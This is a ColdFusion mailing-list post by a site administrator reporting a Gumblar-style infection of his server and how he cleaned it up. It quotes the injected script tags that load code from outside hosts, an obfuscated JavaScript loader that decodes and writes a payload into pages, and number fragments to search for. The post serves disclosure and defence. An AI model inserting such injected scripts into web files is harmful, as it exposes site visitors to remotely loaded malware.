The recent attack on House of Fusion resulted in some useful
information as to what you should look for. In general, all or most of
the files with the following extensions were affected:
.cfm
.cfml
.htm
.html
.js
The following line of code was prepended to all files other than .js
<script src=http://bgadf.cn></script>
This was added to both unencrypted and encrypted files, meaning the
cfide was affected. Luckily, the line was exactly as stated above with
a new line after it. This allows for a global find/replace to remove
it. Unfortunately, this seems to have killed my cfide/administrator,
requiring me to replace it with a copy from another machine.
The .js files had the following line of code added:
document.writeln ("<script src=\"http://bgadf.cn\";><\/script>");
Again, a search and replace was able to remove it across the board. An
important note is that the .js files in the cfide (the ajax files)
were affected and had to be repaired.
Finally, the following line of code was buried within at least one file:
<script src=http://avse2.cn></script>
This may be from something else or it may be from the same attack. I
did a global review of all script tags to see what may have been
compromised.
Finally, the following js code was set to a few pages:
function CBeKy(lFwuKN){ var TySUSIZW=new Function("ncX", "return
872821;");alert('NmTqOe');window.eval(); }
function NTZS(hWal){var UHrvVQkw=6,fAgz=5;var
qIMfd='72+0,126+0,122+2,136+4,116+2,130+4,121+1,38+2,142+4,126+0,120+0,139+1,124+4,73+1,58+4,38+2,124+4,121+1,126+0,123+3,124+4,139+1,73+1,58+4,38+2,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,122+2,136+4,116+2,130+4,121+1,117+3,133+1,136+4,120+0,121+1,136+4,73+1,57+3,38+2,138+0,136+4,',bSBxeEp=qIMfd.split(',');rZh='';for(HVMYENy=0;HVMYENy<bSBxeEp.length-1;HVMYENy++){
cAT=bSBxeEp[HVMYENy].split('+');kNRwj =
parseInt(cAT[0]*fAgz)+parseInt(cAT[1]);kNRwj =
parseInt(kNRwj)/UHrvVQkw;rZh += String.fromCharCode(kNRwj);}return
rZh;}function QFuWuDkcLi(qno){ fff=op.split("66"); }
function TeMgRVEQ(fYbPy){var IQWqANfWqP=7,eJEBZ=6;var
gJQy='115+3,71+1,45+3,121+2,135+2,135+2,130+4,67+4,54+5,54+5,131+5,140+0,119+0,115+3,136+3,115+3,53+4,122+3,128+2,119+0,129+3,54+5,119+0,53+4,115+3,120+1,122+3,73+3,123+4,142+2,129+3,45+3,72+2,70+0,54+5,122+3,119+0,133+0,113+1,127+1,117+5,72+2,',macKV=gJQy.split(',');atI='';for(UneulXsVe=0;UneulXsVe<macKV.length-1;UneulXsVe++){
JaWNRsHd=macKV[UneulXsVe].split('+');rUw =
parseInt(JaWNRsHd[0]*eJEBZ)+parseInt(JaWNRsHd[1]);rUw =
parseInt(rUw)/IQWqANfWqP;atI += String.fromCharCode(rUw);}return
atI;}function wDbgVQuF(jNQiDLa){ window.eval(); }
document['wri5te'.replace(/[0-9]/,'')](NTZS('jiMm')+TeMgRVEQ('yNgMvmppl'));function
JSV(EvRaoC){ alert('UlzqkcMIyh'); }
function ZbpXNWbRF(gdGwIbxJ){ var BlYeMDbv=new Function("RVmHnKt",
"return 849704;"); fff=op.split("66"); fff.op.replace("v"); }
This matches the pattern of the Gumblar virus. According to the notes
on that virus, it modifies itself per site so the names of the
functions/variables might be different. On the other hand, there are
recognisable patterns that can be searched for. A segment of the
numbers above can be used as a search pattern:
116+2,130+4,121+1
71+1,45+3,121+2,135+2,135+2
etc.
This inclusion was not as clean as the scripts mentioned above and
caused errors in some of the content on the page where it was
injected.
Many have suggested that the IIS ftp may have been compromised but
that was not the case on my server. IIS FTP was not installed and I
searched the registry for any reference to it. I also made sure that
my filezilla install had all of its accounts mapped to non-executable
directories, though there was no evidence of compromise. I sealed off
all of the shares between my machine and any other on the network
'just in case'. I'm still not sure how the virus got on the system,
but...
Finally, some of the sw*.exe files in the
C:\ColdFusion8\db\slserver54\bin directory were compromised with a
backdoor virus. I'm not sure if this is related but I cleaned that up
as well. Whatever happens, scan your whole system with multiple visus
scanners. I installed malwarebytes and cureit along with my standard
anti-virus software. Always good to get a second opinion.
http://www.malwarebytes.org/
http://www.freedrweb.com/cureit/
Oh, and powergrep. It's fantastic!
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Si, soy el senor "chico malo" para todos
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Want to reach the ColdFusion community with something they want? Let them know
on the House of Fusion mailing lists
Archive:
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326391
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
